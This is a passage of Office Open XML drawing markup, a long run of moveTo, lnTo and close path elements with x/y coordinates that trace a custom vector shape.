                  <a:pt x="20674" y="13633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20700" y="13665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20725" y="13633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20704" y="13572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20667" y="13489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20653" y="13450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20632" y="13409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20606" y="13357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20580" y="13357"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20725" y="15308"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20700" y="15318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20693" y="15420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20704" y="15533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20709" y="15594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20704" y="15616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20693" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20667" y="15799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20627" y="15902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20570" y="15943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20549" y="15995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20589" y="16046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20580" y="16129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20507" y="16232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20523" y="16251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20518" y="16293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20580" y="16242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20648" y="16149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20693" y="16068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20709" y="16046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20725" y="15985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20756" y="15943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20797" y="15953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20844" y="15873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20895" y="15748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20874" y="15738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20823" y="15789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20792" y="15780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20761" y="15728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20787" y="15626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20771" y="15594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20740" y="15687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20745" y="15542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20766" y="15420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20730" y="15388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20725" y="15308"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20445" y="16129"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20382" y="16190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20346" y="16261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20311" y="16303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20248" y="16405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20186" y="16466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20113" y="16540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20052" y="16591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20005" y="16620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19880" y="16755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19812" y="16848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19802" y="16899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19854" y="16909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19870" y="16951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19922" y="16951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19963" y="16919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20031" y="16858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20118" y="16723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20170" y="16633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20238" y="16582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20278" y="16582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20290" y="16518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20337" y="16466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20414" y="16364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20460" y="16303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20481" y="16242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20486" y="16190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20424" y="16242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20434" y="16190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20445" y="16129"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18869" y="16158"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18848" y="16222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18844" y="16335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18822" y="16428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18813" y="16540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18848" y="16550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18853" y="16550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18926" y="16457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18931" y="16498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18978" y="16386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19009" y="16344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19061" y="16181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19030" y="16171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18978" y="16200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18942" y="16222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18900" y="16171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18869" y="16158"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14464" y="17217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14459" y="17249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14438" y="17301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14429" y="17371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14511" y="17361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14537" y="17301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14542" y="17278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14490" y="17259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14464" y="17217"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7737" y="17544"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7717" y="17596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7670" y="17567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7618" y="17637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7654" y="17698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7691" y="17637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7722" y="17689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7784" y="17647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7788" y="17609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7737" y="17544"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7213" y="17730"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7178" y="17782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7183" y="17875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7167" y="17936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7089" y="17884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6996" y="17801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6950" y="17772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7053" y="17917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7121" y="17987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="18058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7260" y="18080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7307" y="18109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7364" y="18132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7400" y="18090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7406" y="18039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7437" y="18080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7484" y="18080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7494" y="18006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7416" y="17978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7333" y="17904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7286" y="17801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7256" y="17740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213" y="17730"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8085" y="19084"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8054" y="19107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8033" y="19136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8007" y="19168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7976" y="19187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7944" y="19210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7929" y="19251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7882" y="19251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7861" y="19280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7847" y="19322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7840" y="19373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7814" y="19405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7795" y="19444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7774" y="19486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7763" y="19518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7753" y="19569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7774" y="19620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7795" y="19672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7800" y="19713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7800" y="19765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7788" y="19803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7800" y="19845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7814" y="19896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7840" y="19928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7866" y="19980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7899" y="20021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="20060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7944" y="20111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7950" y="20153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7939" y="20195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7903" y="20214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7856" y="20236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7805" y="20246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7758" y="20256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7727" y="20288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7691" y="20307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7639" y="20317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7597" y="20288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7546" y="20256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7494" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7432" y="20227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7432" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7416" y="20307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7359" y="20288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7303" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7244" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7192" y="20227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147" y="20236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7084" y="20214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7032" y="20163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7032" y="20246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6980" y="20256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6928" y="20236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6881" y="20246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6836" y="20265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6789" y="20278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6726" y="20278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6690" y="20236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6634" y="20204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6571" y="20185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6525" y="20195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6462" y="20185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6426" y="20175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6483" y="20256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6514" y="20297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6556" y="20339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6613" y="20339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6655" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6700" y="20419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6707" y="20461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6639" y="20442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6577" y="20432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="20419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6473" y="20442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6415" y="20451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6354" y="20419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6292" y="20410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6219" y="20368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193" y="20400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6146" y="20368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6104" y="20329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6059" y="20297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038" y="20329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="20349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5934" y="20329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5892" y="20339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5819" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5758" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5696" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5571" y="20368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5508" y="20358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5468" y="20368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5411" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5343" y="20358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5291" y="20368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5255" y="20358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5218" y="20358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5187" y="20381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5162" y="20400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5126" y="20432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5074" y="20442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5022" y="20442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4996" y="20461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4949" y="20483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4898" y="20451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4860" y="20471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4876" y="20503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4923" y="20544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959" y="20586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4907" y="20596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4893" y="20625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4872" y="20657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4834" y="20676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4783" y="20689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4711" y="20647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4659" y="20657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4608" y="20666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4540" y="20637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4509" y="20625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4634" y="20740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4700" y="20779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4783" y="20811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4846" y="20843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4928" y="20852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5011" y="20862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5093" y="20872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5183" y="20904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5260" y="20923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5307" y="20965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5307" y="20997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="21026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5239" y="21048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5157" y="21026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5084" y="21035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4990" y="21026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5079" y="21058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5136" y="21087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5223" y="21109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5270" y="21138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5291" y="21170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5312" y="21202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5348" y="21241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5463" y="21253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="21282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5659" y="21305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800" y="21305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5830" y="21334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5758" y="21356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5689" y="21375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581" y="21356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5416" y="21343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5343" y="21366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5187" y="21343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5079" y="21324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959" y="21305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4872" y="21282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4846" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4789" y="21253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4700" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="21305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4601" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4596" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4591" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4591" y="21282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4587" y="21292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4493" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4519" y="21314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4985" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16615" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17081" y="21314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17046" y="21305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16999" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16874" y="21292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16879" y="21273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16879" y="21263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16801" y="21253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16832" y="21212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16780" y="21189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16754" y="21160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16740" y="21138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16724" y="21109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16728" y="21077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16749" y="21048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16735" y="21016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16792" y="20984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16843" y="20955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16900" y="20904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16994" y="20852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17065" y="20852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17149" y="20830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17237" y="20811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17268" y="20769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17211" y="20759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17227" y="20718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17258" y="20689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17279" y="20647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17315" y="20605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17362" y="20564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17409" y="20522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17465" y="20483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17527" y="20442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17590" y="20410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17647" y="20368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17720" y="20339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17781" y="20307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17849" y="20288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17906" y="20246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17958" y="20204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18014" y="20153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18071" y="20111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18113" y="20073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18113" y="20041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18082" y="20021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18061" y="19989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18024" y="19980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17979" y="19970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17927" y="19970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17885" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17833" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17797" y="19948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17797" y="19906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17765" y="19877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17776" y="19835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17734" y="19826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17687" y="19816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="19784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17661" y="19742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17642" y="19713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17590" y="19752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17538" y="19752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17506" y="19733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17460" y="19713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17413" y="19691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17383" y="19662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17357" y="19640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17345" y="19598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17383" y="19559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17371" y="19527"/>
